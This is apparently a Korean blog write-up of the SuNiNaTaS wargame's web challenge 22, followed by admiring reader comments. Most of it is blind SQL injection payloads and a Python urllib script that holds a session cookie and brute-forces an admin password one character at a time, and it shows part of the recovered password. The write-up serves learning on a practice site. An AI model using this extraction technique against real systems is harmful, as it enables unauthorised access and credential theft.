admin' and(substring(pw,1,1)='a')--
OK admin
http://www.suninatas.com/Part_one/web22/web22.asp?id=admin' and(substring(pw,1,1)='a')--&pw=1
http://www.suninatas.com/Part_one/web22/web22.asp?id=guest%27+and%28substring%28pw%2C1%2C1%29%3D%27g%27%29--&pw=1
>>> import urllib.request
>>> resp = urllib.request.urlopen("http://www.suninatas.com/member/mem_action.asp?Hid=ludwings&Hpw=")
>>> resp.read()
>>> words = "abcdefghijklnmopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890!@#$%^&*()_+=-~"
>>> param = "id=admin' and(substring(pw,1,1)='a')--&pw=1"
====
1. login session 유지
>>> import http.cookiejar
>>> import urllib.request
>>> import urllib.parse
>>>
>>> cj = http.cookiejar.CookieJar()
>>> opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj))
>>> resp = opener.open("http://www.suninatas.com/member/mem_action.asp?Hid=ludwings&Hpw=")
>>> print(resp.read())
b'\r\n<script language="javascript">\r\n\tvar auth1 = "1";\r\n\tvar auth = auth1*1;\r\n\r\n\tif (auth == "0"){\r\n\t\talert("Plese Login First!");\r\n\t\tparent.document.location.href="../member/mem_action.asp?licen=login_out";\r\n\t}else{\r\n\t\talert("Welcome To SuNiNaTaS!");\r\n\t\tparent.document.location.href="../main/main.asp";\r\n\t}\r\n</script>'
2. buffer to string
str.decode('utf-8')
>>> words = "abcdefghijklnmopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890!@#$%^&*()_+=-~[]?;:'><.,`/{}"
>>> param1 = 'http://www.suninatas.com/Part_one/web22/web22.asp?id=admin%27+and%28substring%28pw%2C1%2C1%29%3D%27'
>>> param2 = '%27%29--&pw=1'
>>>
admin' and(substring(pw,n,1)=words[i])--
admin' and(substring(pw,1,1)='a')--
N1
N1c3Bilnl
3. 특수문자를 encode 해줘야해..
urllib.error.HTTPError: HTTP Error 406: Not Acceptable
>>> words = "abcdefghijklnmopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890!@#$^&*()_+-~[]?:'><.,/{}"
>>> numbers="123456789"
>>> for i in range(10):
for j in range(len(words)):
full_param = 'http://www.suninatas.com/Part_one/web22/web22.asp?id=admin%27+and%28substring%28pw%2C'+numbers[i]+'%2C1%29%3D%27'+words[j]+param2
resp = opener.open(full_param)
str = resp.read()
str2 = str.decode('utf-8')
if str2.find('OK')>-1:
print(words[j])
break
댓글을 달아 주세요
이야 빡고수시네 ㄷㄷ
제 2의 ㅎㅇ 이가 되기 위해서 공부하고있습니다
우와! 멋저요! 나이스 러드윙스님!!!
감댜합니다